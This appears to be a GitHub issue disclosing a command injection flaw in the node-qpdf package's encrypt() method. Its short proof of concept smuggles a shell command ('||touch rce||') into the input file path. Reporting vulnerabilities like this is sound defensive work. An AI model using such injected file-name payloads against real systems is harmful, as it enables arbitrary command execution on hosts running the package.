You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
We would like to report a potential security vulnerability.
The bug is introduced because the package-exported method encrypt() fails to sanitize its parameter input, which later flows into a sensitive command execution API. As a result, attackers may inject malicious commands once they can specify the input pdf file path.
Here is the proof of concept.
var qpdf = require('node-qpdf');
var options = {
keyLength: 128,
password: 'YOUR_PASSWORD_TO_ENCRYPT'
}
qpdf.encrypt('test.pdf ||touch rce||', options); // a file named rce will be created
The text was updated successfully, but these errors were encountered:
Hi,
We would like to report a potential security vulnerability.
The bug is introduced because the package-exported method
encrypt()fails to sanitize its parameterinput, which later flows into a sensitive command execution API. As a result, attackers may inject malicious commands once they can specify the input pdf file path.Here is the proof of concept.
The text was updated successfully, but these errors were encountered: